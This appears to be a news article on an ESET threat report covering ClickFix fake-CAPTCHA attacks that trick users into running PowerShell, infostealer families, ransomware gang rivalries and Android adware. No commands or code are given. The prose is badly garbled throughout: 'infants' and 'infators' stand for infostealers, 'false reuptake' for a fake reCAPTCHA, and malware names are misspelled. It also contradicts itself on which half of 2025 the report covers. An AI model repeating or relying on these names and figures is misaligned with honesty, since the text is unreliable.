- Clickfix is increasingly used to install infants
- The attack vector saw a 500% increase in the last 6 months
- Users are told to execute commands in Powershell to correct an error
The use of Clickfix attack vector has shot 517% since the second half of 2024, which makes it the second most abused attack vector behind Phishing.
The attack uses a false reuptake to deceive users to run code in a Powershell terminal as a ‘solution’ to a false error.
This makes malware and infators download and execute on the destination device, which then reap and extract confidential data to computer pirates.
Ascent infants infants
ESET’s H2 2025 threat report explains how the computer pirates abuse Clickfix to distribute some of the most popular infestation malware, including Lumma Stealer, Vidarstealer, Stealc and Danabot.
The attack vector is so effective, since it is based on using very simple instructions to deceive users to run complex commands in the Powershell terminal. Many users will simply ignore or will not understand the commands they are running, instead of focusing on trying to correct the error.
Clickfix is generally distributed through phishing electronic emails that will direct the user to a false website that will require the recaptcha verification to access. Powershell commands often avoid antivirus software, so it is a particularly effective way to compromise devices, especially if the hacker can make the user do it for them.
In other news from Infotealer, the ESET threat report shows that Snakedesaler has surpassed agent Tesla as the most detected infestator. SnakeSealer was seen being used in a massive campaign that addressed hundreds of US companies and the EU to steal credentials.
Ransomware gangs experienced an unexpectedly tumultuous period thanks to internal struggles and rivalries between the different ransomware attire. The Dragonforce group launched a wave of disfiguration campaigns against some of the most infamous ransomware groups, including Blacklock, Mamona and ransomware such as Ransomhub Ransomware Ransomware as a service.
Although there have been important application operations of the law against ransomware groups in recent months, including 8Base seizure, it seems that rivalries have caused the greatest damage to the ransomware ecosystem.
In the phones front, the recent series of kaleidoscope infections has raised Android adware detections in 160%. The malware that is distributed through official application stores is nothing new, with the recent Sparkkitty malware distributed through Apple App Store and Google Play Store.
However, the Kaleidoscope malware used a double tip attack method by executing intrusive ads on the target device to generate advertising income, while infected destination devices with a malicious twin application that is downloaded through a third -party applications store.
“From new social engineering techniques to sophisticated mobile threats and the important interruptions of infants of infants, the threat panorama in the first half of 2025 was anything but boring,” said Jiří Kropáč Eset director of threat prevention labor labor.
